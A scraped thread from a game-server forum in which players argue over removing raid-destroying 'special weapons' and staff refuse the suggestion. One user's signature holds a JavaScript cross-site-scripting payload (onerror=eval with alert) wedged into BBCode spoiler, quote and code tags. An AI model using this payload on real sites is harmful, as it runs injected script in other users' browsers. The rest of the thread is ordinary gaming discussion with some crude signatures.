Login to ZARP
Username: Password: Remember me

Poll: For or against removal

For removal 6 26.1%
Against removal 17 73.9%
Total number of voters: 23 ( topkek, UltraBagel, Keith Cozart, Darth, XxmasterxX ) See more
Only registered users can participate to this poll

TOPIC: Special weapon removal

Special weapon removal 8 years 2 months ago #289701

Server Name:ZARP 1/2

Suggestion Title: Removal of special weapons

How would it benefit the server: It would benefit the server because they ruin any chance of properly raiding someone as you can blow up their whole base and probably kill them in the process, this made raiding extremely easy if you spend money or sweat mining then crafting. Completely ruining the skill, challenge and thrill of properly raiding a base and getting at the loot you earned. The reason massive dupes are spawned in is because if they were shot by a matador or something then it might not destroy the whole thing so they stand more of chance with some of it left standing, and if they were removed then little bases with a few fading doors would be fine for stopping a raid and also decreasing lag. These weapons put people that aren't in big clans off of making a base or a shop as they would just get annihilated by a clan that matador's it then rushes in with 5 people to mow down any survivors. I've even tried to make a gun shop and even that was destroyed by a special weapon, this is why I never make stores and go away from everyone else if I'm doing drugs otherwise I'm a just going to be blown up.

Potential Issues/Exploits: None

Additional Notes: I don't necessarily mean a removal from both servers, just 1 or 2.
  • topkek
  • Fresh Boarder
The topic has been locked.

Special weapon removal 8 years 2 months ago #289703

this is never going to happen as this is what makes zarp zarp
  • luke_
  • Legendary Member
  • ZARP VIP Gold Badge
  • -0121-
  • Thanks received: 1139
"R.I.P. Born In Blood" - March the first 2016...
First Seen: Dec 08, 2013 6:54 PM .

Special weapon removal 8 years 2 months ago #289705

This has already been denied in the past and recently been denied by an Owner. It's simply only going to ruin Booster Packs and needed profits for the server to run via booster packs, and make players that worked hard for their items upset.
  • Morgan
  • Legendary Member
  • ZARP VIP Golden Blue Badge
  • Thanks received: 6527

Legendary Spectacular Border
MAL

Special weapon removal 8 years 2 months ago #289706

I would definitely support this but it just won't get removed, it would destroy the economy.
  • Hoi
  • Gold Boarder
  • ZARP VIP
  • Thanks received: 513

Thank you Nexize for VIP

Resigned Global moderator, TTT/DarkRP Admin
Last Edit: 8 years 2 months ago by Hoi.
The following user(s) said Thank You: topkek

Special weapon removal 8 years 2 months ago #289741

I'd prefer the "nerf" approach to the impending special weapons problem, as removing them will ruin the environment of ZARP and also impact on booster pack sales as already stated.
  • stratiic
  • User is blocked
  • ZARP VIP
  • spitting in your mum's twat
  • Thanks received: 1452

Special weapon removal 8 years 2 months ago #289748

I think balancing is a better idea
  • kristofferson
  • Gold Boarder
  • ZARP VIP
  • 420 Blaz It Son
  • Thanks received: 627
I'm EMP's only friend
"Do you have to wear lip stick" - RedPowder 2016
Unable to display Google Map.
[spoiler=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]]'throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13][/spoiler][quote=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]][code=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]...

Special weapon removal 8 years 2 months ago #289760

I just don't understand why anybody would go "lets add some weapons in that blow up a base in one shot!" and people agree with them.
  • topkek
  • Fresh Boarder

Special weapon removal 8 years 2 months ago #289762

Alright First of all its not even possible to raid a decent base without them even if there are 10guys and 3Defending second they cost very much and take time to holster/drop and everyone are trying their best to not lose them i think its fair to have them
  • XxmasterxX
  • Diamond Boarder
  • PartyKing!
  • Thanks received: 714

Special weapon removal 8 years 2 months ago #289764

Yeah bases with alot of people in are extremely hard to raid but that doesn't mean the solution is to completely destroy their whole base then get rushed, now that's unfair. Also all it takes is 1 person to shoot the base then run and hide to holster while his friends raid the base.
  • topkek
  • Fresh Boarder

Special weapon removal 8 years 2 months ago #289766

topkek wrote:
Yeah bases with a lot of people in are extremely hard to raid but that doesn't mean the solution is to completely destroy their whole base then get rushed, now that's unfair. Also all it takes is 1 person to shoot the base then run and hide to holster while his friends raid the base.

Yes true but still its very hard for the raiders to get all the base usally they need to have some milkors and stuff to make a way into the base once they get in they get faced by lets say 3 guys with morphine the other 3 guys have a chance but it still hard for them to take defenders down i think special weapons cant be removed because it would be to hard to raid without them
  • XxmasterxX
  • Diamond Boarder
  • PartyKing!
  • Thanks received: 714

Special weapon removal 8 years 2 months ago #289770

Special weapons is such an unique feature that other RP servers do not have. Also if we went ahead and removed all the special weapons we are gonna make all of the players on SSRP extremely upset. Some people have spent days getting some special weapons. Also there would be no point in adding a feature like this and then go remove it again... As said above special weapons is one of the features that makes Zarp what it is, that is also one of the reasons we have some of the most popular servers in DarkRP... We do simply provide some features where other servers cannot compete
  • Keith Cozart
  • Former Community Manager
  • ZARP VIP Gold Badge
  • The one and only Keith Cozart
  • Thanks received: 1083

Special weapon removal 8 years 2 months ago #289772

Just because it's content that others servers don't have doesn't make it good. ZARP is good in terms of it's fully custom content I'd give it that, but these aren't a good addition. Yeah people would be upset, but they could be compensated with large amounts of money or if they paid with real money then give them VIP.
  • topkek
  • Fresh Boarder

Special weapon removal 8 years 2 months ago #289774

topkek wrote:
Just because it's content that others servers don't have doesn't make it good. ZARP is good in terms of it's fully custom content I'd give it that, but these aren't a good addition. Yeah people would be upset, but they could be compensated with large amounts of money or if they paid with real money then give them VIP.

Or we could not fix something that isn't broken and everybody is still happy?
  • Morgan
  • Legendary Member
  • Thanks received: 6527

Legendary Spectacular Border
MAL

Special weapon removal 8 years 2 months ago #289775

topkek wrote:

Giving the people large amounts of money would ruin the server completely.. .If we had everyone running around with 200m+ would not go to well.. There would be no economy
  • Keith Cozart
  • Former Community Manager
  • ZARP VIP Gold Badge
  • The one and only Keith Cozart
  • Thanks received: 1083

Special weapon removal 8 years 2 months ago #289776

It isn't broken and it isn't good either. I know it won't be changed but there isn't any harm is bringing it up again.
  • topkek
  • Fresh Boarder

Special weapon removal 8 years 2 months ago #289777

Giving the people large amounts of money would ruin the server completely.. .If we had everyone running around with 200m+ would not go to well.. There would be no economy
Well yeah I get where you're coming from but I'm just giving random suggestions. If the weapons were to be removed then something like a community vote or an owner decision could decide something suitable for compensation.
  • topkek
  • Fresh Boarder

Special weapon removal 8 years 2 months ago #289779

Special Weapons will not be removed today, tomorrow or anytime in the near future.

• RedPowder
  • Former Owner
  • Thanks received: 3318
The following user(s) said Thank You: SwiiFTz
Moderators: MadMagic, Kanna.
Time to create page: 0.140 seconds

191 PLAYERS ONLINE

Connect to server View Gametracker DarkRP 1
6/127
Connect to server View Gametracker Deathrun